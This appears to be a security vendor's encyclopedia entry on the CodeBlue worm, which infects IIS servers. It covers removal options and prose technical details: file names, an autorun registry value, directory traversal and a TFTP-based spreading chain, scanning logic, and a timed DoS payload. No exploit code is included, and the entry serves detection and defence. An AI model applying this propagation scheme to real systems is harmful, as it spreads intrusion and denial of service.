Classification

Category :

Malware

Type :

Worm

Aliases :

CodeBlue, IISWorm_BlueCode, BlueCode, Code Blue

Summary

F-Secure have received no reports of this worm from the field.

CodeBlue is the Internet worm targeting Web sites by affecting Internet Information Servers (ISS).

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The worm realizes the method of spreading from Web site to other Web sites by sending and executing its EXE file.

The name of the worm files are constant - SVCHOST.EXE and HTTPEXT.DLL. The EXE file is Win32 application (PE EXE file) about 29K of length, written in Microsoft C++. There also was compressed variant discovered, it is about 14K of size.

Note that the worm uses standard Win32 EXE file names. SVCHOST.EXE and HTTPEXT.DLL can be found in standard Win2000 installations in SYSTEM32 subfolder.

The worm infects only machines with installed IIS package and Web site contents. The worm application being run on a such machine locates and infects remote Web sites (remote machines with installed IIS package): it enters them and by using Web Directory Traversal exploit, sends its copy to there, and spawns that copy in there. As a result the worm infects all vlunerable Web servers that can be accessed from current infected machine, and other infected servers spread the worm copy further, e.t.c.

The worm has payload routine that from 10:00am till 11:00am global time performs DoS attack (Deny of Service) on some machine that seems to be somewhere in China.

When installing itself, the worm creates its copies (EXE and DLL) in the root of C: drive - C:\SVCHOST.EXE and C:\HTTPEXT.DLL. This EXE file is then registered in Registry auto-run key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 Domain Manager = C:\svchost.exe

The worm then creates and swapns C:\D.VBS script file, then looks for INETINFO.EXE application and terminates it, if it is active. The VBS script program also looks to Indexing Service, Indexing Query and printer mapping and removes them.

As a result of above the worm disables security breaches that can be used (or were used) by other worms to infect the machine or/and hackers to break through Web security protections.

To spread further the worm runs 100 threads that scan randomly selected IP addresses and attack them.

In 50% of cases the attacked machines are in the same network, the attacked IP addresses are "aa.bb.??.??", where "aa.bb" is part of infected machine IP address, "??" are random.

In other 50% attacked addresses are really random.

To attack victim machine the worm uses Web Directory Traversal exploit three times:

1. it tries to determine IIS directory on remote machine,
2. then sends request to remote machine to download DLL

 component of the virus (HTTPEXT.DLL file) from infected one,
3. the last request is to copy that DLL file to C: root directory.

To upload DLL file to victim machine the worm uses "tftp" command, and activates temporary TFTP server on infected (current) machine to process "get data" command from victim (remote) machine.

When DLL file is uploaded to victim machine, it is activated by a trick. So the worm copy starts on remote server, then it drops and executes the EXE component, that then spreads virus futhrer.